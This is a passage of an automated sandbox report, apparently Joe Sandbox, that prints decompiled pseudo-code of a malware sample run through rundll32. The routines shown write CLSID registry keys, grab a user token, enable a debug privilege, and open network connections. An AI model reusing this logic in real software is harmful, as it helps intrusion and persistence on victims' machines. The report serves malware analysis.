                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463A9B8
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0463A9E6
                                                            • RegSetValueExW.ADVAPI32(?,0467E09C,00000000,00000003,?,?), ref: 0463AA02
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463AA18
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0463AA41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue$EventOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2801368686-1865207932
                                                            • Opcode ID: f6f8b503b7f7a3ca192a4b784072aa78f9eccde0830bdd5d86e101933dbf09b4
                                                            • Instruction ID: 548635b789f588c769d7e74022cc8a3441d7419e409730144ca7af0d96abbd08
                                                            • Opcode Fuzzy Hash: f6f8b503b7f7a3ca192a4b784072aa78f9eccde0830bdd5d86e101933dbf09b4
                                                            • Instruction Fuzzy Hash: B6218E31A0521CBBDB249FA1DC8DFABBB6CEF44711F004059BA09E6141FA756E04DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E04647240(WCHAR* __ecx, long* __edx, void* __eflags) {
                                                            				void* _v8;
                                                            				intOrPtr _v12;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HINSTANCE__* _t11;
                                                            				_Unknown_base(*)()* _t12;
                                                            				void* _t13;
                                                            				WCHAR* _t16;
                                                            				intOrPtr* _t21;
                                                            				void* _t22;
                                                            
                                                            				_t21 = __edx;
                                                            				_t16 = __ecx;
                                                            				_t22 = 0;
                                                            				if(L0464ABF0() != 2) {
                                                            					 *_t21 = GetEnvironmentVariableW(L"USERPROFILE", _t16,  *__edx);
                                                            					_t22 =  !=  ? 1 : 0;
                                                            					goto L6;
                                                            				} else {
                                                            					_v12 = E046470E0(_t16, __edx, 0);
                                                            					_v8 = 0;
                                                            					_t11 = LoadLibraryA("Wtsapi32.dll");
                                                            					if(_t11 == 0) {
                                                            						L6:
                                                            						return _t22;
                                                            					} else {
                                                            						_t12 = GetProcAddress(_t11, "WTSQueryUserToken");
                                                            						if(_t12 == 0) {
                                                            							goto L6;
                                                            						} else {
                                                            							_t13 =  *_t12(_v12,  &_v8);
                                                            							if(_t13 == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								__imp__GetUserProfileDirectoryW(_v8, _t16, _t21);
                                                            								CloseHandle(_v8);
                                                            								return _t13;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}
                                                            0x04647249
                                                            0x0464724b
                                                            0x0464724d
                                                            0x04647257
                                                            0x046472bf
                                                            0x046472c6
                                                            0x00000000
                                                            0x04647259
                                                            0x04647263
                                                            0x04647266
                                                            0x04647269
                                                            0x04647271
                                                            0x046472ca
                                                            0x046472d1
                                                            0x04647273
                                                            0x04647279
                                                            0x04647281
                                                            0x00000000
                                                            0x04647283
                                                            0x0464728a
                                                            0x0464728e
                                                            0x00000000
                                                            0x04647290
                                                            0x04647295
                                                            0x046472a0
                                                            0x046472ae
                                                            0x046472ae
                                                            0x0464728e
                                                            0x04647281
                                                            0x04647271

                                                            APIs
                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                            • GetEnvironmentVariableW.KERNEL32(USERPROFILE,?,00000104,?,?,?,046368B1), ref: 046472B7
                                                              • Part of subcall function 046470E0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0464711D
                                                              • Part of subcall function 046470E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04647135
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                            • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                            • CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressAllocateCheckCloseEnvironmentFreeHandleInitializeMembershipProcTokenVariableVersion
                                                            • String ID: USERPROFILE$WTSQueryUserToken$Wtsapi32.dll
                                                            • API String ID: 4195895698-4029724716
                                                            • Opcode ID: 562ae5710b5fa37e180789c6bb318e3eaee42143ef0d3c5261aed30a19b19ae3
                                                            • Instruction ID: 63d1f763840b014d329eeabedb64a5fbc52c467b586adf6444e1fe21b57d257d
                                                            • Opcode Fuzzy Hash: 562ae5710b5fa37e180789c6bb318e3eaee42143ef0d3c5261aed30a19b19ae3
                                                            • Instruction Fuzzy Hash: 7D019631700219BF9F145FE9AC4995EFBA9EF946A2B100065F808D2210FB759D509B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E04645D40(void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				void _v32;
                                                            				signed int _t6;
                                                            				_Unknown_base(*)()* _t11;
                                                            				void* _t23;
                                                            				signed int _t30;
                                                            
                                                            				_t32 = (_t30 & 0xfffffff8) - 0x20;
                                                            				_t6 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t6 ^ (_t30 & 0xfffffff8) - 0x00000020;
                                                            				_t23 = OpenProcess(0x400, 0, GetCurrentProcessId());
                                                            				if(_t23 != 0) {
                                                            					_t11 = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtQueryInformationProcess");
                                                            					if(_t11 != 0) {
                                                            						 *_t11(_t23, 0,  &_v32, 0x18, 0);
                                                            						_t27 =  ==  ? _v32 : 0;
                                                            					}
                                                            					CloseHandle(_t23);
                                                            					return E04655AFE(_v8 ^ _t32);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t32);
                                                            				}
                                                            			}
                                                            0x04645d46
                                                            0x04645d49
                                                            0x04645d50
                                                            0x04645d6b
                                                            0x04645d6f
                                                            0x04645d93
                                                            0x04645d9b
                                                            0x04645da9
                                                            0x04645dad
                                                            0x04645dad
                                                            0x04645db3
                                                            0x04645dcb
                                                            0x04645d71
                                                            0x04645d81
                                                            0x04645d81

                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D58
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D65
                                                            • GetModuleHandleW.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D8C
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645D93
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645DB3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: HandleProcess$AddressCloseCurrentModuleOpenProc
                                                            • String ID: NtQueryInformationProcess$ntdll
                                                            • API String ID: 2704359807-2585995557
                                                            • Opcode ID: a6e4f3fe3ea4b0eb1684fa1c67d0bd6d2805250c7d7c811732019b3d3f12fd71
                                                            • Instruction ID: 2c0f5f3e98ae59056362f71d7127f6cc8bed9d20e55fa6346efa3d056905f78e
                                                            • Opcode Fuzzy Hash: a6e4f3fe3ea4b0eb1684fa1c67d0bd6d2805250c7d7c811732019b3d3f12fd71
                                                            • Instruction Fuzzy Hash: B301B5323003116FD714AFA9AC4EB7B77A8EFC8A25F00011DFE1AD7180FE64A9008796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 38%
                                                            			E046441C0(void* __ebx, char _a4) {
                                                            				void* __ecx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				char _t7;
                                                            				_Unknown_base(*)()* _t10;
                                                            				int _t14;
                                                            				void* _t18;
                                                            				char* _t19;
                                                            				void* _t21;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            				intOrPtr* _t24;
                                                            
                                                            				_t18 = __ebx;
                                                            				_t7 = _a4;
                                                            				_t24 = _t19;
                                                            				 *_t24 = 0x467e8b0;
                                                            				 *((intOrPtr*)(_t24 + 4)) = _t7;
                                                            				 *((intOrPtr*)(_t7 + 0x38)) = _t24;
                                                            				 *((intOrPtr*)(_t24 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t24 = 0x467ee4c;
                                                            				_t10 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
                                                            				if(_t10 == 0) {
                                                            					E0464AD30(_t24);
                                                            				} else {
                                                            					_t19 =  &_a4;
                                                            					 *_t10(0x14, 1, 0, _t19);
                                                            				}
                                                            				_t23 = E04644C00(_t18, _t21, _t22, _t24);
                                                            				if(_t23 != 0) {
                                                            					_t14 = LocalSize(_t23);
                                                            					_push(_t19);
                                                            					_t6 = _t24 + 4; // 0x0
                                                            					_push(0x3f);
                                                            					_push(_t14);
                                                            					_push(_t23);
                                                            					E04631C60( *_t6);
                                                            					LocalFree(_t23);
                                                            				}
                                                            				return _t24;
                                                            			}
                                                            0x046441c0
                                                            0x046441c4
                                                            0x046441cb
                                                            0x046441d3
                                                            0x046441d9
                                                            0x046441dc
                                                            0x046441ea
                                                            0x046441ed
                                                            0x046441ff
                                                            0x04644207
                                                            0x04644217
                                                            0x04644209
                                                            0x04644209
                                                            0x04644213
                                                            0x04644213
                                                            0x04644221
                                                            0x04644225
                                                            0x04644228
                                                            0x0464422e
                                                            0x0464422f
                                                            0x04644232
                                                            0x04644234
                                                            0x04644235
                                                            0x04644236
                                                            0x0464423c
                                                            0x0464423c
                                                            0x04644248

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,046878D8,?,04639CBC,?,046878D8,00000000), ref: 046441DF
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,?,?,046878D8,?,04639CBC,?,046878D8,00000000), ref: 046441F3
                                                            • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 046441FF
                                                            • LocalSize.KERNEL32(00000000), ref: 04644228
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,046878D8,?,04639CBC,?,046878D8,00000000), ref: 0464423C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AddressCreateEventFreeLibraryLoadProcSize
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 3057455304-64178277
                                                            • Opcode ID: b91fcc0198dfb431f1d7e9267994d65ca75f443ad5cd80632f7eacdd350504c9
                                                            • Instruction ID: 6bc39930c3cf0fab36ea858b0c4bc5be52ea02f3f8d56e3af2736367b067171b
                                                            • Opcode Fuzzy Hash: b91fcc0198dfb431f1d7e9267994d65ca75f443ad5cd80632f7eacdd350504c9
                                                            • Instruction Fuzzy Hash: C8017171280301BBE7185FA6DC4AF6B7AA8EB95B50F00441DF2499B280FFB5B840C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E046459C0(void* __ecx) {
                                                            				char _v8;
                                                            				intOrPtr _v12;
                                                            				char _v44;
                                                            				_Unknown_base(*)()* _t10;
                                                            				intOrPtr _t13;
                                                            				_Unknown_base(*)()* _t15;
                                                            				void* _t19;
                                                            
                                                            				_t19 = __ecx;
                                                            				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                            				if(_t10 == 0) {
                                                            					L6:
                                                            					return 0;
                                                            				} else {
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v12 = 0;
                                                            					asm("movups [ebp-0x28], xmm0");
                                                            					asm("movups [ebp-0x18], xmm0");
                                                            					 *_t10( &_v44);
                                                            					_t13 = _v44;
                                                            					if(_t13 == 6 || _t13 == 9) {
                                                            						_v8 = 0;
                                                            						_t15 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            						if(_t15 != 0) {
                                                            							 *_t15(_t19,  &_v8);
                                                            						}
                                                            						return 0 | _v8 == 0x00000000;
                                                            					} else {
                                                            						goto L6;
                                                            					}
                                                            				}
                                                            			}
                                                            0x046459d1
                                                            0x046459da
                                                            0x046459e2
                                                            0x04645a41
                                                            0x04645a47
                                                            0x046459e4
                                                            0x046459e4
                                                            0x046459e7
                                                            0x046459f2
                                                            0x046459f6
                                                            0x046459fa
                                                            0x046459fc
                                                            0x04645a03
                                                            0x04645a15
                                                            0x04645a23
                                                            0x04645a2b
                                                            0x04645a32
                                                            0x04645a32
                                                            0x04645a40
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04645a03

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000,?,?,?,?,?,?,?,?,?,04645AE3,?,?,00000000), ref: 046459D3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046459DA
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04645A1C
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645A23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                            • API String ID: 2574300362-3073145729
                                                            • Opcode ID: 5f70d80e508e4b80e1b7eec346dc99e718a26cfe5c0fb2fda168cbb23599392d
                                                            • Instruction ID: bc7948845007f5be9b4c9d567acb94da691311189e0ecc6ff69043d3673391b6
                                                            • Opcode Fuzzy Hash: 5f70d80e508e4b80e1b7eec346dc99e718a26cfe5c0fb2fda168cbb23599392d
                                                            • Instruction Fuzzy Hash: BC01DF32E45309ABDF04DFF0DC8DAAE7B78EB98211F106659F909A2140FA75AAC4C751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E04634670(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                            				signed char _t21;
                                                            				signed int _t27;
                                                            				signed int _t28;
                                                            				WCHAR* _t30;
                                                            				void* _t37;
                                                            				WCHAR* _t38;
                                                            				signed int _t39;
                                                            				WCHAR* _t40;
                                                            				WCHAR* _t41;
                                                            				WCHAR* _t42;
                                                            
                                                            				_t37 = __ecx;
                                                            				_t41 = _a4;
                                                            				_push(2 + lstrlenW(_t41) * 2);
                                                            				_t40 = E0465EF79(_t37);
                                                            				if(_t40 != 0) {
                                                            					lstrcpyW(_t40, _t41);
                                                            					_t42 = _t40;
                                                            					if( *_t40 != 0x5c || _t40[1] != 0x5c) {
                                                            						if(_t40[1] == 0x3a) {
                                                            							_t27 = _t40[2] & 0x0000ffff;
                                                            							_t11 =  &(_t40[2]); // 0x4
                                                            							_t42 = _t11;
                                                            							if(_t27 != 0 && _t27 == 0x5c) {
                                                            								_t42 =  &(_t42[1]);
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_t28 = _t40[2] & 0x0000ffff;
                                                            						_t6 =  &(_t40[2]); // 0x4
                                                            						_t38 = _t6;
                                                            						if(_t28 != 0) {
                                                            							while(_t28 != 0x5c) {
                                                            								_t38 = CharNextW(_t38);
                                                            								_t28 =  *_t38 & 0x0000ffff;
                                                            								if(_t28 != 0) {
                                                            									continue;
                                                            								}
                                                            								goto L7;
                                                            							}
                                                            						}
                                                            						L7:
                                                            						_t7 =  &(_t38[1]); // 0x2
                                                            						_t30 =  ==  ? _t38 : _t7;
                                                            						if( *_t30 != 0) {
                                                            							_t39 =  *_t30 & 0x0000ffff;
                                                            							while(_t39 != 0x5c) {
                                                            								_t30 = CharNextW(_t30);
                                                            								_t39 =  *_t30 & 0x0000ffff;
                                                            								if(_t39 != 0) {
                                                            									continue;
                                                            								}
                                                            								goto L11;
                                                            							}
                                                            						}
                                                            						L11:
                                                            						_t8 =  &(_t30[1]); // 0x2
                                                            						_t42 =  ==  ? _t30 : _t8;
                                                            					}
                                                            					if( *_t42 == 0) {
                                                            						L26:
                                                            						L0465ED17(_t40);
                                                            						return 1;
                                                            					} else {
                                                            						do {
                                                            							if( *_t42 != 0x5c) {
                                                            								goto L25;
                                                            							} else {
                                                            								 *_t42 = 0;
                                                            								_t21 = GetFileAttributesW(_t40);
                                                            								if(_t21 != 0xffffffff) {
                                                            									if((_t21 & 0x00000010) == 0) {
                                                            										goto L22;
                                                            									} else {
                                                            										goto L24;
                                                            									}
                                                            								} else {
                                                            									if(CreateDirectoryW(_t40, 0) != 0 || GetLastError() == 0xb7) {
                                                            										L24:
                                                            										 *_t42 = 0x5c;
                                                            										goto L25;
                                                            									} else {
                                                            										L22:
                                                            										L0465ED17(_t40);
                                                            										return 0;
                                                            									}
                                                            								}
                                                            							}
                                                            							goto L27;
                                                            							L25:
                                                            							_t42 = CharNextW(_t42);
                                                            						} while ( *_t42 != 0);
                                                            						goto L26;
                                                            					}
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            				L27:
                                                            			}


                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,0463572D,?,?,?,?), ref: 04634679
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 046346A0
                                                            • CharNextW.USER32(00000004), ref: 046346CE
                                                            • CharNextW.USER32(00000006), ref: 046346F7
                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0463473C
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0463474A
                                                            • GetLastError.KERNEL32 ref: 04634754
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CharNext$AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 227312388-0
                                                            • Opcode ID: abac3ddf42d50555acb8cc836e41db4e2a2ba991e5cd9e1db1192322ea3124d4
                                                            • Instruction ID: fb8683cf477f2c35a12392e27f54107d70f543aeb35cdacd1f0e2aba020f2ad7
                                                            • Opcode Fuzzy Hash: abac3ddf42d50555acb8cc836e41db4e2a2ba991e5cd9e1db1192322ea3124d4
                                                            • Instruction Fuzzy Hash: 4C3126719002519ADF242F65E8486B6F3F8FF63367B50412EE84883290FF76B881C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E04640A80(void* __ebx, void* __ecx, short* __edx, short* _a4, short* _a8) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				int _v16;
                                                            				void* __esi;
                                                            				int* _t25;
                                                            				void* _t26;
                                                            				int _t34;
                                                            				int _t37;
                                                            				long _t39;
                                                            				char* _t41;
                                                            				short* _t43;
                                                            				int* _t47;
                                                            				void* _t49;
                                                            
                                                            				_t45 = __ecx;
                                                            				_v8 = 0;
                                                            				_t47 = 0;
                                                            				_v16 = 0;
                                                            				_v12 = 0;
                                                            				_t48 = 0;
                                                            				_t25 = RegOpenKeyExW(__ecx, __edx, 0, 0x103,  &_v8);
                                                            				if(_t25 != 0) {
                                                            					L11:
                                                            					_t26 = _v8;
                                                            					if(_t26 != 0) {
                                                            						RegCloseKey(_t26);
                                                            					}
                                                            					if(_t48 != 0) {
                                                            						L04655B0F(_t48);
                                                            					}
                                                            					return _t47;
                                                            				}
                                                            				_t43 = _a8;
                                                            				if(RegQueryValueExW(_v8, _t43, _t25, _t25, _t25, _t25) != 2 || RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                                            					L10:
                                                            					goto L11;
                                                            				} else {
                                                            					_t34 = _v12;
                                                            					_t54 = _t34;
                                                            					if(_t34 != 0) {
                                                            						_push(_t34);
                                                            						_t41 = L04655B55(_t45, 0, _t54);
                                                            						_t49 = _t49 + 4;
                                                            						_t48 = _t41;
                                                            					}
                                                            					_t37 = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t48,  &_v12);
                                                            					if(_t37 == 0 && RegSetValueExW(_v8, _t43, _t37, _v16, _t48, _v12) == 0) {
                                                            						_t39 = RegDeleteValueW(_v8, _a4);
                                                            						if(_t39 != 0) {
                                                            							RegDeleteValueW(_v8, _t43);
                                                            						} else {
                                                            							_t21 = _t39 + 1; // 0x1
                                                            							_t47 = _t21;
                                                            						}
                                                            					}
                                                            					goto L10;
                                                            				}
                                                            			}


                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000103,?), ref: 04640AAD
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640AC7
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640AE2
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B0F
                                                            • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B25
                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B35
                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04640B48
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000103,?), ref: 04640B57
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Value$Query$Delete$CloseOpen
                                                            • String ID:
                                                            • API String ID: 2816288289-0
                                                            • Opcode ID: 97782468a7b238a2b4a9001f80cb38957870cc23f647999e46cf3145eda608d2
                                                            • Instruction ID: 78609b45f8ed8a31b7eda9f687b9b09ff44565c0fe9ceb7fc30798d215350963
                                                            • Opcode Fuzzy Hash: 97782468a7b238a2b4a9001f80cb38957870cc23f647999e46cf3145eda608d2
                                                            • Instruction Fuzzy Hash: 4B310FB5A00118BFEF119FA1DD48EAEBB7DEB44744F104054FA05E2110F735AF549B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 16%
                                                            			E0464F0B0(void* __eax, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                            				intOrPtr _t14;
                                                            				long _t19;
                                                            				intOrPtr _t21;
                                                            				intOrPtr* _t31;
                                                            
                                                            				_t31 = __ecx;
                                                            				if(_a8 == 0) {
                                                            					_t14 = _a4;
                                                            					_t24 =  !=  ? 0x1c : 0x10;
                                                            					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t14,  !=  ? 0x1c : 0x10);
                                                            					if(_t14 == 0xffffffff) {
                                                            						goto L10;
                                                            					} else {
                                                            						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
                                                            						if(_t14 == 0xffffffff) {
                                                            							goto L10;
                                                            						} else {
                                                            							 *((intOrPtr*)(__ecx + 0x4c)) = 1;
                                                            							 *((intOrPtr*)(__ecx + 0x50)) = 1;
                                                            							SetLastError(0);
                                                            							if( *((intOrPtr*)( *_t31 + 0x7c))() != 2) {
                                                            								goto L5;
                                                            							} else {
                                                            								_t19 = GetLastError();
                                                            								_t20 =  ==  ? 0x4c7 : _t19;
                                                            								__imp__#112( ==  ? 0x4c7 : _t19);
                                                            								goto L10;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30); // 0x30 = FD_CONNECT | FD_CLOSE: non-blocking connect, completion is signalled on the event at +0x20
                                                            					if(__eax == 0xffffffff) {
                                                            						L10:
                                                            						return 0;
                                                            					} else {
                                                            						_t21 = _a4;
                                                            						_t28 =  !=  ? 0x1c : 0x10;
                                                            						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t21,  !=  ? 0x1c : 0x10); // ordinal #4 = connect(), same sockaddr-length selection as above
                                                            						if(_t21 == 0) {
                                                            							L5:
                                                            							return 1;
                                                            						} else {
                                                            							if(_t21 != 0xffffffff) {
                                                            								goto L10;
                                                            							} else {
                                                            								__imp__#111(); // WS2_32 ordinal #111 = WSAGetLastError()
                                                            								if(_t21 != 0x2733) { // 0x2733 = WSAEWOULDBLOCK (10035): a connect still in progress on the non-blocking socket is treated as success (L5)
                                                            									goto L10;
                                                            								} else {
                                                            									goto L5;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}







                                                            0x0464f0b8
                                                            0x0464f0ba
                                                            0x0464f116
                                                            0x0464f127
                                                            0x0464f12f
                                                            0x0464f138
                                                            0x00000000
                                                            0x0464f13a
                                                            0x0464f142
                                                            0x0464f14b
                                                            0x00000000
                                                            0x0464f14d
                                                            0x0464f14d
                                                            0x0464f156
                                                            0x0464f15d
                                                            0x0464f16d
                                                            0x00000000
                                                            0x0464f16f
                                                            0x0464f16f
                                                            0x0464f17c
                                                            0x0464f180
                                                            0x00000000
                                                            0x0464f180
                                                            0x0464f16d
                                                            0x0464f14b
                                                            0x0464f0bc
                                                            0x0464f0c4
                                                            0x0464f0cd
                                                            0x0464f186
                                                            0x0464f18a
                                                            0x0464f0d3
                                                            0x0464f0d3
                                                            0x0464f0e4
                                                            0x0464f0ec
                                                            0x0464f0f4
                                                            0x0464f10c
                                                            0x0464f113
                                                            0x0464f0f6
                                                            0x0464f0f9
                                                            0x00000000
                                                            0x0464f0ff
                                                            0x0464f0ff
                                                            0x0464f10a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464f10a
                                                            0x0464f0f9
                                                            0x0464f0f4
                                                            0x0464f0cd

                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 0464F0C4
                                                            • connect.WS2_32(?,?,00000010), ref: 0464F0EC
                                                            • WSAGetLastError.WS2_32 ref: 0464F0FF
                                                            • connect.WS2_32(?,?,00000010), ref: 0464F12F
                                                            • WSAEventSelect.WS2_32(?,?,00000023), ref: 0464F142
                                                            • SetLastError.KERNEL32(00000000), ref: 0464F15D
                                                            • GetLastError.KERNEL32 ref: 0464F16F
                                                            • WSASetLastError.WS2_32(00000000), ref: 0464F180
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EventSelectconnect
                                                            • String ID:
                                                            • API String ID: 371153081-0
